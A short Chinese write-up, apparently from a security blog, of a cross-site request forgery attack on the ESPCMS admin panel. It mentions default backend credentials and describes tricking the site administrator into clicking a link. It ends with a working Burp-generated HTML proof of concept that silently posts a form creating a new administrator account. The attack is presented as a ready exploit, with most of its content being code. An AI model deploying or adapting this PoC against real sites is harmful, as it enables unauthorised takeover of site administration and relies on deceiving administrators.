ESPCMS的CSRF添加管理员账号
前言
这里开始的思路是先注入进去 然后getshell 但是不关CSRF什么事
换思路 看了一下群消息 大哥发了一个视频 后台名称admin admin123
0X01 CSRF攻击之旅
进后台添加管理 这里 为了试验环境 需要把你加的管理先删除了
然后POST抓包 添加用户的这里构造CSRF
然后社工管理员
管理点击后
成功
exp
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://www.espcms.com/adminsoft/index.php?archive=management&action=managesava" method="POST">
<input type="hidden" name="inputclass" value="add" />
<input type="hidden" name="tab" value="true" />
<input type="hidden" name="username" value="zhong" />
<input type="hidden" name="password" value="zhongzhong" />
<input type="hidden" name="password2" value="zhongzhong" />
<input type="hidden" name="name" value="zhong" />
<input type="hidden" name="sex" value="1" />
<input type="hidden" name="powergroup" value="1" />
<input type="hidden" name="inputclassid" value="1" />
<input type="hidden" name="isremote" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>